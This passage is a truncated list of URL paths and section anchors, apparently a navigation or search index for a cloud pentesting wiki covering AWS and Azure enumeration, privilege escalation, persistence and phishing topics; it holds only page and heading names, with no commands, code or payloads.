ws-security/aws-services/aws-relational-database-rds-enum.html#authentication","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#public-access--vpc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#encryption","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#sql-injection","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#aws---route53-enum","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#route-53","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#ip-based-routing","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws---secrets-manager-enum","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws-secrets-manager","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#aws---ses-enum","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#smtp-user","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#aws---sns-enum","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#sns","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#difference-with-sqs","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#aws---sqs-enum","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#sqs","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#aws---s3-athena--glacier-enum","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#bucket-versioning-and-mfa-based-delete","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-access-logs","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-presigned-urls","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-encryption-mechanisms","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#dual-stack","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-post-exploitation","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#other-s3-vulns","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-http-cache-poisoning-issue","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#amazon-athena","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#aws---step-functions-enum","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#step-functions","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#standard-vs-express-workflows","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#states","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#task","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#choice","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#failsucceed","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#pass","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#wait","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#parallel","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#map","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#versions-and-aliases","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#iam-roles-for-state-machines","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#aws---sts-enum","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#sts","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#assume-role-impersonation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#aws---other-services-enum","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#directconnect","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#support","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws---unauthenticated-enum--access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws-credentials-leaks","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws-unauthenticated-enum--access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#cross-account-attacks","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#tools","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#aws---accounts-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#account-ids","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#brute-force","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#osint","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#marketplace","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#errors","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#aws---api-gateway-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#api-invoke-bypass","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#iam-policy-injection","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#get-account-id-from-public-api-gateway-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#aws---cloudfront-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#aws---cognito-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#unauthenticated-cognito","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#identity-pool-id","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#user-pool-id","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#pacu-modules-for-pentesting-and-enumeration","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#aws---codebuild-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#buildspecyml","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#self-hosted-github-actions-runners-in-aws-codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#aws---documentdb-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#aws---dynamodb-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#dynamo-db","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#aws---ec2-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#ec2--related-services","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#public-ports","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#public-amis--ebs-snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#enumerate-ec2-instances-with-public-ip","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#aws---ecr-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#ecr","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#public-registry-repositories-images","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#enumerate-private-repo","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#aws---ecs-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#ecs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#publicly-accessible-security-group-or-load-balancer-for-ecs-services","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#aws---elastic-beanstalk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#web-vulnerability","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#insecure-security-group-rules","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#publicly-accessible-load-balancer","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#publicly-accessible-s3-buckets","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#enumerate-public-environments","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#aws---elasticsearch-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#aws---iam--sts-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#enumerate-roles--usernames-in-an-account","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#assume-role-brute-force","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#trust-policies-brute-force-cross-account-roles-and-users","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#privesc","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#third-party-oidc-federation","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws---identity-center--sso-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws-device-code-phishing","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#attack","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#phishing-the-unphisable-mfa","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#automatic-tools","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#aws---iot-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#aws---kinesis-video-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#aws---lambda-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#public-function-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#get-account-id-from-public-lambda-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#aws---media-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#aws---mq-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#public-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#rabbitmq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#activemq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#aws---msk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#public-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#aws---rds-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#public-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#public-rds-snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#aws---redshift-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#aws---sqs-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#sqs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#check-permissions","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#aws---sns-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#sns","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#open-to-all","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#s3-public-buckets","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#finding-aws-buckets","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#find-the-region","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#enumerating-the-bucket","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#get-account-id-from-public-bucket","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#confirming-a-bucket-belongs-to-an-aws-account","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#used-emails-as-root-account-enumeration","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#references","pentesting-cloud/azure-security/index.html#azure-pentesting","pentesting-cloud/azure-security/index.html#basic-information","pentesting-cloud/azure-security/index.html#azure-pentesterred-team-methodology","pentesting-cloud/azure-security/index.html#external-enum--initial-access","pentesting-cloud/azure-security/index.html#azure--entra-id-tooling","pentesting-cloud/azure-security/index.html#bypass-access-policies","pentesting-cloud/azure-security/index.html#whoami","pentesting-cloud/azure-security/index.html#entra-id-enumeration--privesc","pentesting-cloud/azure-security/index.html#azure-enumeration","pentesting-cloud/azure-security/index.html#privilege-escalation-post-exploitation--persistence","pentesting-cloud/azure-security/az-basic-information/index.html#az---basic-information","pentesting-cloud/azure-security/az-basic-information/index.html#organization-hierarchy","pentesting-cloud/azure-security/az-basic-information/index.html#management-groups","pentesting-cloud/azure-security/az-basic-information/index.html#azure-subscriptions","pentesting-cloud/azure-security/az-basic-information/index.html#resource-groups","pentesting-cloud/azure-security/az-basic-information/index.html#azure-resource-ids","pentesting-cloud/azure-security/az-basic-information/index.html#azure-vs-entra-id-vs-azure-ad-domain-services","pentesting-cloud/azure-security/az-basic-information/index.html#azure","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-formerly-azure-active-directory","pentesting-cloud/azure-security/az-basic-information/index.html#entra-domain-services-formerly-azure-ad-ds","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-principals","pentesting-cloud/azure-security/az-basic-information/index.html#users","pentesting-cloud/azure-security/az-basic-information/index.html#members--guests-default-permissions","pentesting-cloud/azure-security/az-basic-information/index.html#users-default-configurable-permissions","pentesting-cloud/azure-security/az-basic-information/index.html#groups","pentesting-cloud/azure-security/az-basic-information/index.html#service-principals","pentesting-cloud/azure-security/az-basic-information/index.html#app-registrations","pentesting-cloud/azure-security/az-basic-information/index.html#default-consent-permissions","pentesting-cloud/azure-security/az-basic-information/index.html#managed-identity-metadata","pentesting-cloud/azure-security/az-basic-information/index.html#enterprise-applications","pentesting-cloud/azure-security/az-basic-information/index.html#administrative-units","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-roles--permissions","pentesting-cloud/azure-security/az-basic-information/index.html#azure-roles--permissions","pentesting-cloud/azure-security/az-basic-information/index.html#built-in-roles","pentesting-cloud/azure-security/az-basic-information/index.html#custom-roles","pentesting-cloud/azure-security/az-basic-information/index.html#permissions-order","pentesting-cloud/azure-security/az-basic-information/index.html#global-administrator","pentesting-cloud/azure-security/az-basic-information/index.html#assignments-conditions--mfa","pentesting-cloud/azure-security/az-basic-information/index.html#deny-assignments","pentesting-cloud/azure-security/az-basic-information/index.html#azure-policies","pentesting-cloud/azure-security/az-basic-information/index.html#permissions-inheritance","pentesting-cloud/azure-security/az-basic-information/index.html#azure-rbac-vs-abac","pentesting-cloud/azure-security/az-basic-information/index.html#references","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#az---tokens--public-applications","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#basic-information","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#oauth","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#authentication-tokens","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#access-tokens-aud","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#access-tokens-scopes-scp","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#get-refresh--access-token-example","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#other-access-token-fields","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#foci-tokens-privilege-escalation","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#get-different-scope","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#get-different-client-and-scopes","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#where-to-find-tokens","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#references","pentesting-cloud/azure-security/az-enumeration-tools.html#az---enumeration-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#install-powershell-in-linux","pentesting-cloud/azure-security/az-enumeration-tools.html#install-powershell-in-macos","pentesting-cloud/azure-security/az-enumeration-tools.html#main-enumeration-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#az-cli","pentesting-cloud/azure-security/az-enumeration-tools.html#az-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#microsoft-graph-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#azuread-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#automated-recon--compliance-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#turbot-azure-plugins","pentesting-cloud/azure-security/az-enumeration-tools.html#prowler","pentesting-cloud/azure-security/az-enumeration-tools.html#monkey365","pentesting-cloud/azure-security/az-enumeration-tools.html#scoutsuite","pentesting-cloud/azure-security/az-enumeration-tools.html#azure-mg-sub-governance-reporting","pentesting-cloud/azure-security/az-enumeration-tools.html#automated-post-exploitation-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#roadrecon","pentesting-cloud/azure-security/az-enumeration-tools.html#azurehound","pentesting-cloud/azure-security/az-enumeration-tools.html#microburst","pentesting-cloud/azure-security/az-enumeration-tools.html#powerzure","pentesting-cloud/azure-security/az-enumeration-tools.html#graphrunner","pentesting-cloud/azure-security/az-enumeration-tools.html#stormspotter","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#az---unauthenticated-enum--initial-entry","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-tenant","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#tenant-enumeration","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#user-enumeration","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#password-spraying--brute-force","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-services-using-domains","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#filesystem-credentials","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#references","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#az---container-registry-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#container-registry-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#anonymous-pull-access","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#az---oauth-apps-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#oauth-app-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#app-consent-permissions","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#2-types-of-attacks","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#users-are-allowed-to-consent","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#application-admins","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#attack-flow-overview","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#example-attack","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#other-tools","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#post-exploitation","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#phishing-post-exploitation","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#entra-id-applications-admin","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#application-post-exploitation","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#references","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#az---storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#open-storage","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#sas-urls","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#az---vms-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#virtual-machines","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#exposed-vulnerable-service","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#public-gallery-images","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#public-extensions","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.html#az---device-code-authentication-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#az---password-spraying","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#password-spray","pentesting-cloud/azure-security/az-services/index.html#az---services","pentesting-cloud/azure-security/az-services/index.html#portals","pentesting-cloud/azure-security/az-services/index.html#raw-requests","pentesting-cloud/azure-security/az-services/index.html#list-of-services","pentesting-cloud/azure-security/az-services/az-azuread.html#az---entra-id-azuread--azure-iam","pentesting-cloud/azure-security/az-services/az-azuread.html#basic-information","pentesting-cloud/azure-security/az-services/az-azuread.html#enumeration","pentesting-cloud/azure-security/az-services/az-azuread.html#connection","pentesting-cloud/azure-security/az-services/az-azuread.html#tenants","pentesting-cloud/azure-security/az-services/az-azuread.html#users","pentesting-cloud/azure-security/az-services/az-azuread.html#mfa--conditional-access-policies","pentesting-cloud/azure-security/az-services/az-azuread.html#groups","pentesting-cloud/azure-security/az-services/az-azuread.html#service-principals","pentesting-cloud/azure-security/az-services/az-azuread.html#applications","pentesting-cloud/azure-security/az-services/az-azuread.html#managed-identities","pentesting-cloud/azure-security/az-services/az-azuread.html#azure-roles","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-id-roles","pentesting-cloud/azure-security/az-services/az-azuread.html#devices","pentesting-cloud/azure-security/az-services/az-azuread.html#admini